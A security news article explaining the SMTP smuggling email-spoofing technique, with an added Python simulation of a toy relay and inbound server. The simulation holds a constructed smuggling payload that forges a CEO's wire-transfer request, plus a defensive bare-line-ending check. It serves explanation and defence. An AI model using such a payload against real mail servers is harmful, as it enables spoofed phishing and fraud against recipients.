Security researchers have documented a new technique that lets threat actors send spoofed emails from forged sender addresses. It enables highly targeted phishing while slipping past email security controls.
Timo Longin, a senior security consultant at SEC Consult, published a report on the technique, which he called SMTP smuggling.
SMTP (Simple Mail Transfer Protocol) is the TCP/IP protocol mail servers use to hand messages to one another. A message body is terminated by the end-of-data sequence <CR><LF>.<CR><LF>, but implementations disagree about which variants of that sequence count. When an outbound server only recognises the standard sequence, a non-standard one such as <LF>.<LF> stays inside the message data and is relayed untouched; if the inbound server on the other end does treat <LF>.<LF> as end-of-data, the attacker has “escaped” the message data and can “smuggle” arbitrary SMTP commands, including an entire second email with a forged sender, into the same session.
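To make the mechanism concrete, here is an added simulation; it is not code from SEC Consult's report or from any real mail server. A toy outbound relay terminates DATA only at the standard <CR><LF>.<CR><LF> and dot-stuffs per CRLF line, and a toy inbound server can be run either strictly or with a lenient list of accepted end-of-data sequences. The message, the domains and the lenient sequence list are constructed for illustration.

```python
from dataclasses import dataclass

# Constructed attacker input: the DATA payload as the attacker's client hands
# it to the outbound relay. The bare "\n.\n" followed by a second transaction
# is the smuggled part; everything else looks like an ordinary message.
SMUGGLED_DATA = (
    "From: legit@attacker.example\r\n"
    "To: victim@target.example\r\n"
    "Subject: harmless\r\n"
    "\r\n"
    "Hello.\r\n"
    "\n.\n"                               # non-standard end-of-data
    "MAIL FROM:<ceo@target.example>\r\n"  # smuggled second transaction
    "RCPT TO:<victim@target.example>\r\n"
    "DATA\r\n"
    "From: ceo@target.example\r\n"
    "To: victim@target.example\r\n"
    "Subject: Urgent wire transfer\r\n"
    "\r\n"
    "Please pay the attached invoice today.\r\n"
    "\r\n.\r\n"                           # standard end-of-data
)

STRICT_EOD = ("\r\n.\r\n",)
# Illustrative lenient list; real servers differ in which variants they take.
LENIENT_EOD = ("\r\n.\r\n", "\n.\n", "\r.\r")


@dataclass
class Message:
    mail_from: str
    rcpt_to: list
    body: str


def outbound_relay(client_data: str) -> str:
    """Toy outbound server: ends DATA only at <CRLF>.<CRLF>, then re-emits the
    body with dot-unstuffing/stuffing done on CRLF-delimited lines. In its
    view "\n.\nMAIL FROM..." is one line that starts with "\n", not ".", so
    the embedded sequence is relayed untouched."""
    idx = client_data.find("\r\n.\r\n")
    if idx == -1:
        raise ValueError("unterminated DATA")
    received = [l[1:] if l.startswith(".") else l
                for l in client_data[:idx].split("\r\n")]
    sent = ["." + l if l.startswith(".") else l for l in received]
    return "\r\n".join(sent) + "\r\n.\r\n"


def inbound_server(stream: str, eod_sequences) -> list:
    """Toy inbound server: reads CRLF-separated commands; after DATA it takes
    message text up to the earliest occurrence of any accepted end-of-data
    sequence, then returns to command mode."""
    messages, pos, mail_from, rcpts = [], 0, None, []
    while (end := stream.find("\r\n", pos)) != -1:
        line, pos = stream[pos:end], end + 2
        upper = line.upper()
        if upper.startswith("MAIL FROM:"):
            mail_from, rcpts = line[len("MAIL FROM:"):].strip("<> "), []
        elif upper.startswith("RCPT TO:"):
            rcpts.append(line[len("RCPT TO:"):].strip("<> "))
        elif upper == "DATA":
            hits = [(i, s) for s in eod_sequences
                    if (i := stream.find(s, pos)) != -1]
            if not hits:
                raise ValueError("unterminated DATA")
            idx, seq = min(hits)
            messages.append(Message(mail_from, list(rcpts), stream[pos:idx]))
            pos, mail_from, rcpts = idx + len(seq), None, []
        elif upper == "QUIT":
            break
    return messages


def contains_bare_line_ending(data: str) -> bool:
    """Check a hardened server on either side could apply before accepting
    DATA: reject any LF not preceded by CR, or CR not followed by LF."""
    for i, ch in enumerate(data):
        if ch == "\n" and (i == 0 or data[i - 1] != "\r"):
            return True
        if ch == "\r" and (i + 1 == len(data) or data[i + 1] != "\n"):
            return True
    return False


def simulate(eod_sequences) -> list:
    """Run one session from the attacker's client via the relay to an inbound
    server that accepts the given end-of-data sequences."""
    stream = ("MAIL FROM:<legit@attacker.example>\r\n"
              "RCPT TO:<victim@target.example>\r\nDATA\r\n"
              + outbound_relay(SMUGGLED_DATA) + "QUIT\r\n")
    return inbound_server(stream, eod_sequences)


if __name__ == "__main__":
    for name, eod in (("strict", STRICT_EOD), ("lenient", LENIENT_EOD)):
        msgs = simulate(eod)
        print(f"{name}: {len(msgs)} message(s) delivered")
        for m in msgs:
            print(f"  MAIL FROM {m.mail_from} -> {m.rcpt_to}")
    print("bare line ending in DATA:", contains_bare_line_ending(SMUGGLED_DATA))
```

Run as-is, the strict inbound server delivers one message whose body visibly contains the stray commands, whereas the lenient one delivers two, the second apparently from ceo@target.example. Because the second message arrives over the legitimate outbound server's connection, its source address is whatever that server's is, which is why a sender check alone does not catch it; the bare-line-ending check shows the simplest way a server can refuse such payloads outright.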
No problem for Cisco
According to the report, the technique can be exploited through outbound servers operated by Microsoft, GMX and Cisco, and it also affects the SMTP implementations of Postfix and Sendmail on the receiving side.
Microsoft and GMX have already addressed the issue, but some reports claim that Cisco has decided not to. When discussing the issue, the company apparently said that SMTP smuggling is not exactly a vulnerability, but rather “a feature and that they will not change the default configuration.”
As a result, threat actors can still potentially smuggle emails into Cisco Secure Email instances running the default configuration. SEC Consult concluded that the best course of action for Cisco users is to change the CR and LF Handling setting from “Clean” to “Allow”, as this keeps spoofed emails that would otherwise pass DMARC checks out of the inbox.
Phishing remains the top attack vector for most threat actors: it is ubiquitous, cheap and easy to automate. Attackers pose as major brands, corporate executives and the like, and use AI writing tools to craft emails with a sense of urgency. Victims often act on these emails (by clicking a link or opening an attachment) without considering the risk, resulting in endpoint compromise or data theft.
Via The Hacker News